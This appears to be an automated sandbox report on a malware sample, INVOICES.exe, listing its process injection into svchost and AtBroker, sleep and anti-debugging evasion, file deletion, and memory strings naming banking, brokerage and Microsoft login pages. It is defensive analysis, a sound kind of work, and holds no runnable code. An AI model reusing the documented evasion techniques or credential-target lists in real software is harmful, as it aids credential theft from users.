Source: C:\Users\user\Desktop\INVOICES.exe -- API coverage: 4.3 %
Source: C:\Windows\SysWOW64\svchost.exe -- API coverage: 0.6 %
Source: C:\Windows\SysWOW64\AtBroker.exe -- API coverage: 2.7 %
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 8164 -- Thread sleep count: 132 > 30
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 8164 -- Thread sleep time: -264000s >= -30000s
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 8164 -- Thread sleep count: 9841 > 30
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 8164 -- Thread sleep time: -19682000s >= -30000s
Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe TID: 8180 -- Thread sleep time: -70000s >= -30000s
Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe TID: 8180 -- Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe TID: 8180 -- Thread sleep time: -41000s >= -30000s
Source: C:\Windows\SysWOW64\AtBroker.exe -- Last function: Thread delayed
Source: C:\Windows\SysWOW64\AtBroker.exe -- Last function: Thread delayed
Source: C:\Users\user\Desktop\INVOICES.exe -- Code function: 0_2_0079449B GetFileAttributesW,FindFirstFileW,FindClose -- 0_2_0079449B
Source: C:\Users\user\Desktop\INVOICES.exe -- Code function: 0_2_0079C75D FindFirstFileW,FindClose -- 0_2_0079C75D
Source: C:\Users\user\Desktop\INVOICES.exe -- Code function: 0_2_0079C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf -- 0_2_0079C7E8
Source: C:\Users\user\Desktop\INVOICES.exe -- Code function: 0_2_0079F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose -- 0_2_0079F021
Source: C:\Users\user\Desktop\INVOICES.exe -- Code function: 0_2_0079F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose -- 0_2_0079F17E
Source: C:\Users\user\Desktop\INVOICES.exe -- Code function: 0_2_0079F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose -- 0_2_0079F47F
Source: C:\Users\user\Desktop\INVOICES.exe -- Code function: 0_2_00793833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose -- 0_2_00793833
Source: C:\Users\user\Desktop\INVOICES.exe -- Code function: 0_2_00793B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose -- 0_2_00793B56
Source: C:\Users\user\Desktop\INVOICES.exe -- Code function: 0_2_0079BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose -- 0_2_0079BD48
Source: C:\Windows\SysWOW64\AtBroker.exe -- Code function: 5_2_0035C720 FindFirstFileW,FindNextFileW,FindClose -- 5_2_0035C720
Source: C:\Users\user\Desktop\INVOICES.exe -- Code function: 0_2_00734AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo -- 0_2_00734AFE
Source: 27-180b5.5.dr -- Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 27-180b5.5.dr -- Binary or memory string: discord.comVMware20,11696494690f
Source: 27-180b5.5.dr -- Binary or memory string: AMC password management pageVMware20,11696494690
Source: 27-180b5.5.dr -- Binary or memory string: outlook.office.comVMware20,11696494690s
Source: AtBroker.exe, 00000005.00000002.3877965889.000000000457C000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: VMware20,11696494690n
Source: 27-180b5.5.dr -- Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 27-180b5.5.dr -- Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 27-180b5.5.dr -- Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: XORjEgwNIUb.exe, 00000006.00000002.3876977168.0000000001269000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
Source: 27-180b5.5.dr -- Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 27-180b5.5.dr -- Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 27-180b5.5.dr -- Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 27-180b5.5.dr -- Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 27-180b5.5.dr -- Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: AtBroker.exe, 00000005.00000002.3877965889.000000000457C000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Interactive Brokers - GDCDYNVMware20,1169
Source: 27-180b5.5.dr -- Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: AtBroker.exe, 00000005.00000002.3877965889.000000000457C000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: kers.comVMware20,11696494690}
Source: 27-180b5.5.dr -- Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 27-180b5.5.dr -- Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: AtBroker.exe, 00000005.00000002.3877965889.000000000457C000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: ebrokers.co.inVMware20,11696494690d
Source: 27-180b5.5.dr -- Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: AtBroker.exe, 00000005.00000002.3876263575.000000000073A000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 27-180b5.5.dr -- Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: firefox.exe, 0000000A.00000002.1990649752.00000244268BE000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{{
Source: 27-180b5.5.dr -- Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 27-180b5.5.dr -- Binary or memory string: tasks.office.comVMware20,11696494690o
Source: AtBroker.exe, 00000005.00000002.3877965889.000000000457C000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: ice.comVMware20,11696494690s
Source: 27-180b5.5.dr -- Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 27-180b5.5.dr -- Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 27-180b5.5.dr -- Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 27-180b5.5.dr -- Binary or memory string: global block list test formVMware20,11696494690
Source: 27-180b5.5.dr -- Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 27-180b5.5.dr -- Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 27-180b5.5.dr -- Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 27-180b5.5.dr -- Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 27-180b5.5.dr -- Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: AtBroker.exe, 00000005.00000002.3877965889.000000000457C000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: outlook.office365.comVMware20,1169649
Source: 27-180b5.5.dr -- Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: AtBroker.exe, 00000005.00000002.3877965889.000000000457C000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Transaction PasswordVMware20,11696494690}
Source: 27-180b5.5.dr -- Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 27-180b5.5.dr -- Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Windows\SysWOW64\svchost.exe -- Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe -- Process queried: DebugPort
Source: C:\Windows\SysWOW64\AtBroker.exe -- Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0367096E rdtsc -- 2_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_004177D3 LdrLoadDll -- 2_2_004177D3
Source: C:\Users\user\Desktop\INVOICES.exe -- Code function: 0_2_007A401F BlockInput -- 0_2_007A401F
Source: C:\Users\user\Desktop\INVOICES.exe -- Code function: 0_2_00733B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW -- 0_2_00733B4C
Source: C:\Users\user\Desktop\INVOICES.exe -- Code function: 0_2_00765BFC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer -- 0_2_00765BFC
Source: C:\Users\user\Desktop\INVOICES.exe -- Code function: 0_2_0085CA00 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect -- 0_2_0085CA00
Source: C:\Users\user\Desktop\INVOICES.exe -- Code function: 0_2_00943480 mov eax, dword ptr fs:[00000030h] -- 0_2_00943480
Source: C:\Users\user\Desktop\INVOICES.exe -- Code function: 0_2_009434E0 mov eax, dword ptr fs:[00000030h] -- 0_2_009434E0
Source: C:\Users\user\Desktop\INVOICES.exe -- Code function: 0_2_00941E70 mov eax, dword ptr fs:[00000030h] -- 0_2_00941E70
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036D437C mov eax, dword ptr fs:[00000030h] -- 2_2_036D437C
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] -- 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] -- 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] -- 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] -- 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] -- 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] -- 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] -- 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] -- 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] -- 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] -- 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] -- 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] -- 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] -- 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] -- 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] -- 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] -- 2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] -- 2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] -- 2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h] -- 2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] -- 2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] -- 2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h] -- 2_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036D8350 mov ecx, dword ptr fs:[00000030h] -- 2_2_036D8350
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0370634F mov eax, dword ptr fs:[00000030h] -- 2_2_0370634F
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h] -- 2_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_03708324 mov ecx, dword ptr fs:[00000030h] -- 2_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h] -- 2_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h] -- 2_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h] -- 2_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h] -- 2_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h] -- 2_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h] -- 2_2_0362C310
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h] -- 2_2_03650310
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] -- 2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] -- 2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] -- 2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] -- 2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] -- 2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] -- 2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] -- 2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] -- 2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h] -- 2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h] -- 2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h] -- 2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036663FF mov eax, dword ptr fs:[00000030h] -- 2_2_036663FF
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h] -- 2_2_036EC3CD
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] -- 2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] -- 2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] -- 2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] -- 2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] -- 2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] -- 2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] -- 2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] -- 2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] -- 2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] -- 2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h] -- 2_2_036B63C0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h] -- 2_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h] -- 2_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h] -- 2_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h] -- 2_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h] -- 2_2_036D43D4
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h] -- 2_2_036D43D4
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h] -- 2_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h] -- 2_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h] -- 2_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0365438F mov eax, dword ptr fs:[00000030h] -- 2_2_0365438F
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0365438F mov eax, dword ptr fs:[00000030h] -- 2_2_0365438F
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h] -- 2_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h] -- 2_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h] -- 2_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h] -- 2_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h] -- 2_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h] -- 2_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0362826B mov eax, dword ptr fs:[00000030h] -- 2_2_0362826B
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] -- 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] -- 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] -- 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] -- 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] -- 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] -- 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] -- 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] -- 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] -- 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] -- 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] -- 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] -- 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h] -- 2_2_036B8243
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h] -- 2_2_036B8243
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0370625D mov eax, dword ptr fs:[00000030h] -- 2_2_0370625D
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h] -- 2_2_0362A250
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_03636259 mov eax, dword ptr fs:[00000030h] -- 2_2_03636259
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h] -- 2_2_036EA250
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h] -- 2_2_036EA250
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0362823B mov eax, dword ptr fs:[00000030h] -- 2_2_0362823B
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h] -- 2_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h] -- 2_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h] -- 2_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] -- 2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] -- 2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] -- 2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] -- 2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] -- 2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_037062D6 mov eax, dword ptr fs:[00000030h] -- 2_2_037062D6
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h] -- 2_2_036402A0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h] -- 2_2_036402A0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] -- 2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h] -- 2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] -- 2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] -- 2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] -- 2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] -- 2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h] -- 2_2_0366E284
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h] -- 2_2_0366E284
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h] -- 2_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h] -- 2_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h] -- 2_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_03704164 mov eax, dword ptr fs:[00000030h] -- 2_2_03704164
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_03704164 mov eax, dword ptr fs:[00000030h] -- 2_2_03704164
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h] -- 2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h] -- 2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h] -- 2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h] -- 2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h] -- 2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h] -- 2_2_0362C156
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h] -- 2_2_036C8158
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_03636154 mov eax, dword ptr fs:[00000030h] -- 2_2_03636154
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_03636154 mov eax, dword ptr fs:[00000030h] -- 2_2_03636154
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_03660124 mov eax, dword ptr fs:[00000030h] -- 2_2_03660124
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] -- 2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h] -- 2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] -- 2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] -- 2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h] -- 2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] -- 2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] -- 2_2_036DE10E
